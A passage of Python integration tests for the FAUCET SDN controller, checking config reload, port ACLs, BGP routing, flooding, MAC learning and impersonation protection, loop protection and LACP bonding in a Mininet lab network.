- rule:
actions: {allow: 1}
eth_type: 34525
ip_proto: 6
ipv6_dst: ::1
ipv6_src: ::1
tcp_dst: 65535
tcp_src: 65535
"""
class FaucetConfigReloadTestBase(FaucetTest):
"""Test handling HUP signal with config change."""
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
tagged_vlans: [200]
"""
ACL = """
acls:
1:
- rule:
description: "rule 1"
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
2:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 1
3:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5003
actions:
allow: 0
4:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5002
actions:
allow: 1
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 5001
actions:
allow: 0
deny:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 0
- rule:
cookie: COOKIE
actions:
allow: 0
allow:
- rule:
cookie: COOKIE
dl_type: 0x800
ip_proto: 6
tcp_dst: 65535
actions:
allow: 1
- rule:
cookie: COOKIE
actions:
allow: 1
"""
ACL_COOKIE = None
def setUp(self): # pylint: disable=invalid-name
super(FaucetConfigReloadTestBase, self).setUp()
self.ACL_COOKIE = random.randint(1, 2**16-1)
self.ACL = self.ACL.replace('COOKIE', str(self.ACL_COOKIE))
self.acl_config_file = '%s/acl.yaml' % self.tmpdir
with open(self.acl_config_file, 'w') as config_file:
config_file.write(self.ACL)
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
class FaucetDelPortTest(FaucetConfigReloadTestBase):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
200:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: allow
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 200
"""
def test_port_down_flow_gone(self):
last_host = self.hosts_name_ordered()[-1]
self.require_host_learned(last_host)
second_host_dst_match = {'eth_dst': last_host.MAC()}
self.wait_until_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
self.change_port_config(
self.port_map['port_4'], None, None,
restart=True, cold_start=True)
self.wait_until_no_matching_flow(
second_host_dst_match, table_id=self._ETH_DST_TABLE)
class FaucetConfigReloadTest(FaucetConfigReloadTestBase):
def test_add_unknown_dp(self):
conf = self._get_faucet_conf()
conf['dps']['unknown'] = {
'dp_id': int(self.rand_dpid()),
'hardware': 'Open vSwitch',
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
def test_tabs_are_bad(self):
self._enable_event_log()
self.ping_all_when_learned()
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
good_config_hash_info = event['CONFIG_CHANGE']['config_hash_info']
self.assertNotEqual('', good_config_hash_info['hashes'])
orig_conf = self._get_faucet_conf()
self.force_faucet_reload(
'\t'.join(('tabs', 'are', 'bad')))
self.assertEqual(1, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: not event['CONFIG_CHANGE']['success'])
self.assertEqual('', event['CONFIG_CHANGE']['config_hash_info']['hashes'])
self.ping_all_when_learned()
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, change_expected=False)
self.assertEqual(0, self.scrape_prometheus_var('faucet_config_load_error', dpid=False))
event = self._wait_until_matching_event(lambda event: event['CONFIG_CHANGE']['success'])
self.assertEqual(good_config_hash_info, event['CONFIG_CHANGE']['config_hash_info'])
def test_port_change_vlan(self):
first_host, second_host = self.hosts_name_ordered()[:2]
third_host, fourth_host = self.hosts_name_ordered()[2:]
self.ping_all_when_learned()
self.change_port_config(
self.port_map['port_1'], 'native_vlan', 200,
restart=False, cold_start=False)
self.wait_until_matching_flow(
{'vlan_vid': 200}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.change_port_config(
self.port_map['port_2'], 'native_vlan', 200,
restart=True, cold_start=False)
for port_name in ('port_1', 'port_2'):
self.wait_until_matching_flow(
{'in_port': int(self.port_map[port_name])},
table_id=self._VLAN_TABLE,
actions=['SET_FIELD: {vlan_vid:4296}'])
self.one_ipv4_ping(first_host, second_host.IP(), require_host_learned=False)
# hosts 1 and 2 now in VLAN 200, so they shouldn't see floods for 3 and 4.
self.verify_vlan_flood_limited(
third_host, fourth_host, first_host)
def test_port_change_acl(self):
self.ping_all_when_learned()
first_host, second_host = self.hosts_name_ordered()[0:2]
orig_conf = self._get_faucet_conf()
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE, cookie=self.ACL_COOKIE)
self.wait_until_matching_flow(
{'vlan_vid': 100}, table_id=self._ETH_SRC_TABLE,
actions=['OUTPUT:CONTROLLER', 'GOTO_TABLE:%u' % self._ETH_DST_TABLE])
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.reload_conf(
orig_conf, self.faucet_config_path,
restart=True, cold_start=False, host_cache=100)
self.verify_tp_dst_notblocked(
5001, first_host, second_host, table_id=None)
self.verify_tp_dst_notblocked(
5002, first_host, second_host, table_id=None)
def test_port_change_perm_learn(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
self.change_port_config(
self.port_map['port_1'], 'permanent_learn', True,
restart=True, cold_start=False)
self.ping_all_when_learned(hard_timeout=0)
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.retry_net_ping(hosts=(first_host, second_host))
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
self.change_port_config(
self.port_map['port_1'], 'acl_in', 1,
restart=True, cold_start=False)
self.wait_until_matching_flow(
{'in_port': int(self.port_map['port_1']),
'eth_type': IPV4_ETH, 'tcp_dst': 5001, 'ip_proto': 6},
table_id=self._PORT_ACL_TABLE)
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
class FaucetDeleteConfigReloadTest(FaucetConfigReloadTestBase):
def test_delete_interface(self):
# With all ports changed, we should cold start.
conf = self._get_faucet_conf()
del conf['dps'][self.DP_NAME]['interfaces']
conf['dps'][self.DP_NAME]['interfaces'] = {
int(self.port_map['port_1']): {
'native_vlan': '100',
'tagged_vlans': ['200'],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetRouterConfigReloadTest(FaucetConfigReloadTestBase):
def test_router_config_reload(self):
conf = self._get_faucet_conf()
conf['routers'] = {
'router-1': {
'vlans': ['100', '200'],
}
}
self.reload_conf(
conf, self.faucet_config_path,
restart=True, cold_start=True, change_expected=True)
class FaucetConfigReloadAclTest(FaucetConfigReloadTestBase):
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acls_in: [allow]
%(port_2)d:
native_vlan: 100
acl_in: allow
%(port_3)d:
native_vlan: 100
acl_in: deny
%(port_4)d:
native_vlan: 100
acl_in: deny
"""
def _verify_hosts_learned(self, hosts):
self.pingAll()
for host in hosts:
self.require_host_learned(host)
self.assertEqual(len(hosts), self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
def test_port_acls(self):
hup = not self.STAT_RELOAD
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self._verify_hosts_learned((first_host, second_host))
self.change_port_config(
self.port_map['port_3'], 'acl_in', 'allow',
restart=True, cold_start=False, hup=hup)
self.change_port_config(
self.port_map['port_1'], 'acls_in', [3, 4, 'allow'],
restart=True, cold_start=False, hup=hup)
self.coldstart_conf(hup=hup)
self._verify_hosts_learned((first_host, second_host, third_host))
self.verify_tp_dst_blocked(5001, first_host, second_host)
self.verify_tp_dst_notblocked(5002, first_host, second_host)
self.verify_tp_dst_blocked(5003, first_host, second_host)
class FaucetConfigStatReloadAclTest(FaucetConfigReloadAclTest):
# Use the stat-based reload method.
STAT_RELOAD = '1'
class FaucetUntaggedBGPDualstackDefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24", "fc00::1:254/112"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1", "::1"]
neighbor_addresses: ["127.0.0.1", "::1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
for _ in range(2):
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4DefaultRouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import default route from BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 0.0.0.0/0 next-hop 10.0.0.1 local-preference 100;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
first_host, second_host = self.hosts_name_ordered()[:2]
first_host_alias_ip = ipaddress.ip_interface('10.99.99.99/24')
first_host_alias_host_ip = ipaddress.ip_interface(
ipaddress.ip_network(first_host_alias_ip.ip))
self.host_ipv4_alias(first_host, first_host_alias_ip)
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.add_host_route(
second_host, first_host_alias_host_ip, self.FAUCET_VIPV4.ip)
self.one_ipv4_ping(second_host, first_host_alias_ip.ip)
self.one_ipv4_controller_ping(first_host)
self.coldstart_conf()
class FaucetUntaggedBGPIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and import from BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: 10.99.99.0/24
ip_gw: 10.0.0.1
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_peer_conf = """
static {
route 10.0.1.0/24 next-hop 10.0.0.1 local-preference 100;
route 10.0.2.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.3.0/24 next-hop 10.0.0.2 local-preference 100;
route 10.0.4.0/24 next-hop 10.0.0.254;
route 10.0.5.0/24 next-hop 10.10.0.1;
}
"""
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(
mininet_test_util.LOCALHOST, self.exabgp_peer_conf)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes received."""
first_host, second_host = self.hosts_name_ordered()[:2]
# wait until 10.0.0.1 has been resolved
self.wait_for_route_as_flow(
first_host.MAC(), ipaddress.IPv4Network('10.99.99.0/24'))
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
self.wait_exabgp_sent_updates(self.exabgp_log)
self.verify_invalid_bgp_route(r'.+10.0.4.0\/24.+cannot be us$')
self.verify_invalid_bgp_route(r'.+10.0.5.0\/24.+because nexthop not in VLAN.+')
self.wait_for_route_as_flow(
second_host.MAC(), ipaddress.IPv4Network('10.0.3.0/24'))
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
for host in first_host, second_host:
self.one_ipv4_controller_ping(host)
self.verify_traveling_dhcp_mac()
class FaucetUntaggedIPv4RouteTest(FaucetUntaggedTest):
"""Test IPv4 routing and export to BGP."""
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
routes:
- route:
ip_dst: "10.0.1.0/24"
ip_gw: "10.0.0.1"
- route:
ip_dst: "10.0.2.0/24"
ip_gw: "10.0.0.2"
- route:
ip_dst: "10.0.3.0/24"
ip_gw: "10.0.0.2"
routers:
router1:
bgp:
as: 1
connect_mode: "passive"
port: %(bgp_port)d
routerid: "1.1.1.1"
server_addresses: ["127.0.0.1"]
neighbor_addresses: ["127.0.0.1"]
vlan: 100
""" + """
neighbor_as: %u
""" % PEER_BGP_AS
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
""" + CONFIG_BOILER_UNTAGGED
exabgp_log = None
exabgp_err = None
config_ports = {'bgp_port': None}
def pre_start_net(self):
exabgp_conf = self.get_exabgp_conf(mininet_test_util.LOCALHOST)
self.exabgp_log, self.exabgp_err = self.start_exabgp(exabgp_conf)
def test_untagged(self):
"""Test IPv4 routing, and BGP routes sent."""
self.verify_ipv4_routing_mesh()
self.flap_all_switch_ports()
self.verify_ipv4_routing_mesh()
self.wait_bgp_up(
mininet_test_util.LOCALHOST, 100, self.exabgp_log, self.exabgp_err)
self.assertGreater(
self.scrape_prometheus_var(
'bgp_neighbor_routes', {'ipv': '4', 'vlan': '100'}),
0)
# exabgp should have received our BGP updates
updates = self.exabgp_updates(self.exabgp_log)
for route_string in (
'10.0.0.0/24 next-hop 10.0.0.254',
'10.0.1.0/24 next-hop 10.0.0.1',
'10.0.2.0/24 next-hop 10.0.0.2',
'10.0.2.0/24 next-hop 10.0.0.2'):
self.assertTrue(re.search(route_string, updates), msg=updates)
# test nexthop expired when port goes down
first_host = self.hosts_name_ordered()[0]
match, table = self.match_table(ipaddress.IPv4Network('10.0.0.1/32'))
ofmsg = None
for _ in range(5):
self.one_ipv4_controller_ping(first_host)
ofmsg = self.get_matching_flow(match, table_id=table)
if ofmsg:
break
time.sleep(1)
self.assertTrue(ofmsg, msg=match)
self.set_port_down(self.port_map['port_1'])
for _ in range(5):
if not self.get_matching_flow(match, table_id=table):
return
time.sleep(1)
self.fail('host route %s still present' % match)
class FaucetUntaggedRestBcastIPv4RouteTest(FaucetUntaggedIPv4RouteTest):
CONFIG = """
arp_neighbor_timeout: 2
max_resolve_backoff_time: 1
interfaces:
%(port_1)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_2)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_3)d:
native_vlan: 100
restricted_bcast_arpnd: true
%(port_4)d:
native_vlan: 100
restricted_bcast_arpnd: true
"""
class FaucetUntaggedVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.ping_all_when_learned()
self.assertTrue(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoVLanUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: False
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# VLAN level config to disable flooding takes precedence,
# cannot enable port-only flooding.
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedNoPortUnicastFloodTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
unicast_flood: True
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
unicast_flood: False
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.assertFalse(self.bogus_mac_flooded_to_port1())
class FaucetUntaggedHostMoveTest(FaucetUntaggedTest):
def test_untagged(self):
self._enable_event_log()
first_host, second_host = self.hosts_name_ordered()[0:2]
for _ in range(2):
self.retry_net_ping(hosts=(first_host, second_host))
self.ping((first_host, second_host))
for host, in_port in (
(first_host, self.port_map['port_1']),
(second_host, self.port_map['port_2'])):
self.require_host_learned(host, in_port=in_port)
self.swap_host_macs(first_host, second_host)
for port in (self.port_map['port_1'], self.port_map['port_2']):
self.wait_until_matching_lines_from_file(
r'.+L2_LEARN.+"previous_port_no": %u.+' % port, self.event_log)
class FaucetUntaggedHostPermanentLearnTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
permanent_learn: True
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
self.ping_all_when_learned(hard_timeout=0)
first_host, second_host, third_host = self.hosts_name_ordered()[:3]
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
# 3rd host impersonates 1st but 1st host still OK
original_third_host_mac = third_host.MAC()
third_host.setMAC(first_host.MAC())
self.assertEqual(100.0, self.ping((second_host, third_host)))
self.assertTrue(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_1']))
self.assertFalse(self.prom_mac_learned(first_host.MAC(), port=self.port_map['port_3']))
self.retry_net_ping(hosts=(first_host, second_host))
# 3rd host stops impersonating, now everything fine again.
third_host.setMAC(original_third_host_mac)
self.ping_all_when_learned(hard_timeout=0)
class FaucetCoprocessorTest(FaucetUntaggedTest):
N_UNTAGGED = 3
N_TAGGED = 1
CONFIG = """
interfaces:
%(port_1)d:
coprocessor: {strategy: vlan_vid}
mirror: %(port_4)d
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
# Inject packet into pipeline using coprocessor.
coprocessor_host, first_host, second_host, _ = self.hosts_name_ordered()
self.one_ipv4_ping(first_host, second_host.IP())
tcpdump_filter = ' and '.join((
'ether dst %s' % first_host.MAC(),
'ether src %s' % coprocessor_host.MAC(),
'icmp'))
cmds = [
lambda: coprocessor_host.cmd(
'arp -s %s %s' % (first_host.IP(), first_host.MAC())),
lambda: coprocessor_host.cmd(
'fping %s -c3 %s' % (self.FPING_ARGS_SHORT, first_host.IP())),
]
tcpdump_txt = self.tcpdump_helper(
first_host, tcpdump_filter, cmds, timeout=5, vflags='-vv', packets=1)
self.assertFalse(self.tcpdump_rx_packets(tcpdump_txt, packets=0))
class FaucetUntaggedLoopTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
loop_protect: True
%(port_4)d:
native_vlan: 100
loop_protect: True
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetUntaggedLoopTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def total_port_bans(self):
total_bans = 0
for i in range(self.LINKS_PER_HOST * self.N_UNTAGGED):
port_labels = self.port_labels(self.port_map['port_%u' % (i + 1)])
total_bans += self.scrape_prometheus_var(
'port_learn_bans', port_labels, dpid=True, default=0)
return total_bans
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()
# Normal learning works
self.one_ipv4_ping(first_host, second_host.IP())
start_bans = self.total_port_bans()
# Create a loop between interfaces on second host - a veth pair,
# with two bridges, each connecting one leg of the pair to a host
# interface.
self.quiet_commands(second_host, (
'ip link add name veth-loop1 type veth peer name veth-loop2',
'ip link set veth-loop1 up',
'ip link set veth-loop2 up',
# TODO: tune for loop mitigation performance.
'tc qdisc add dev veth-loop1 root tbf rate 1000kbps latency 10ms burst 1000',
'tc qdisc add dev veth-loop2 root tbf rate 1000kbps latency 10ms burst 1000',
# Connect one leg of veth pair to first host interface.
'brctl addbr br-loop1',
'brctl setfd br-loop1 0',
'ip link set br-loop1 up',
'brctl addif br-loop1 veth-loop1',
'brctl addif br-loop1 %s-eth0' % second_host.name,
# Connect other leg of veth pair.
'brctl addbr br-loop2',
'brctl setfd br-loop2 0',
'ip link set br-loop2 up',
'brctl addif br-loop2 veth-loop2',
'brctl addif br-loop2 %s-eth1' % second_host.name))
# Flood some traffic into the loop
for _ in range(3):
first_host.cmd('fping %s -c3 10.0.0.254' % self.FPING_ARGS_SHORT)
end_bans = self.total_port_bans()
if end_bans > start_bans:
return
time.sleep(1)
self.assertGreater(end_bans, start_bans)
# Break the loop, and learning should work again
self.quiet_commands(second_host, (
'ip link set veth-loop1 down',
'ip link set veth-loop2 down',))
self.one_ipv4_ping(first_host, second_host.IP())
class FaucetUntaggedIPv4LACPTest(FaucetTest):
NUM_DPS = 1
N_TAGGED = 0
N_UNTAGGED = 2
LINKS_PER_HOST = 2
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
faucet_vips: ["10.0.0.254/24"]
"""
CONFIG = """
max_resolve_backoff_time: 1
lacp_timeout: 3
interfaces:
%(port_1)d:
native_vlan: 100
lacp: 1
%(port_2)d:
native_vlan: 100
lacp: 1
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetUntaggedIPv4LACPTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
first_host = self.hosts_name_ordered()[0]
bond = 'bond0'
# Linux driver should have this state (0x3f/63)
#
# Actor State: 0x3f, LACP Activity, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...1 = LACP Activity: Active
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGSA]
# FAUCET should have this state (0x3e/62)
# Actor State: 0x3e, LACP Timeout, Aggregation, Synchronization, Collecting, Distributing
# .... ...0 = LACP Activity: Passive
# .... ..1. = LACP Timeout: Short Timeout
# .... .1.. = Aggregation: Aggregatable
# .... 1... = Synchronization: In Sync
# ...1 .... = Collecting: Enabled
# ..1. .... = Distributing: Enabled
# .0.. .... = Defaulted: No
# 0... .... = Expired: No
# [Actor State Flags: **DCSGS*]
lag_ports = (1, 2)
synced_state_txt = r"""
Slave Interface: \S+-eth0
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: 0
Partner Churned Count: 0
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 255
port number: %d
port state: 62
Slave Interface: \S+-eth1
MII Status: up
Speed: \d+ Mbps
Duplex: full
Link Failure Count: \d+
Permanent HW addr: \S+
Slave queue ID: 0
Aggregator ID: \d+
Actor Churn State: monitoring
Partner Churn State: monitoring
Actor Churned Count: 0
Partner Churned Count: 0
details actor lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:99
port key: \d+
port priority: 255
port number: \d+
port state: 63
details partner lacp pdu:
system priority: 65535
system mac address: 0e:00:00:00:00:01
oper key: 1
port priority: 255
port number: %d
port state: 62
""".strip() % tuple([self.port_map['port_%u' % i] for i in lag_ports])
lacp_timeout = 5
def prom_lacp_up_ports():
lacp_up_ports = 0
for lacp_port in lag_ports:
port_labels = self.port_labels(self.port_map['port_%u' % lacp_port])
lacp_state = self.scrape_prometheus_var('port_lacp_state', port_labels, default=0)
lacp_up_ports += 1 if lacp_state == 3 else 0
return lacp_up_ports
def require_lag_up_ports(expected_up_ports):
for _ in range(lacp_timeout*10):
if prom_lacp_up_ports() == expected_up_ports:
break
time.sleep(1)
self.assertEqual(prom_lacp_up_ports(), expected_up_ports)
def require_linux_bond_up():
for _retries in range(lacp_timeout*2):
result = first_host.cmd('cat /proc/net/bonding/%s|sed "s/[ \t]*$//g"' % bond)
result = '\n'.join([line.rstrip() for line in result.splitlines()])
with open(os.path.join(self.tmpdir, 'bonding-state.txt'), 'w') as state_file:
state_file.write(result)
if re.search(synced_state_txt, result):
break
time.sleep(1)
self.assertTrue(
re.search(synced_state_txt, result),
msg='LACP did not synchronize: %s\n\nexpected:\n\n%s' % (
result, synced_state_txt))
# Start with ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
orig_ip = first_host.IP()
switch = self.first_switch()
bond_members = [pair[0].name for pair in first_host.connectionsTo(switch)]
# Deconfigure bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set %s down' % bond_member,
'ip address flush dev %s' % bond_member))
# Configure bond interface
self.quiet_commands(first_host, (
('ip link add %s address 0e:00:00:00:00:99 '
'type bond mode 802.3ad lacp_rate fast miimon 100') % bond,
'ip add add %s/24 dev %s' % (orig_ip, bond),
'ip link set %s up' % bond))
# Add bond members
for bond_member in bond_members:
self.quiet_commands(first_host, (
'ip link set dev %s master %s' % (bond_member, bond),))
for _flaps in range(2):
# All ports down.
for port in lag_ports:
self.set_port_down(self.port_map['port_%u' % port])
require_lag_up_ports(0)
# Pick a random port to come up.
up_port = random.choice(lag_ports)
self.set_port_up(self.port_map['port_%u' % up_port])
require_lag_up_ports(1)
# We have connectivity with only one port.
self.one_ipv4_ping(
first_host, self.FAUCET_VIPV4.ip, require_host_learned=False, intf=bond, retries=5)
for port in lag_ports:
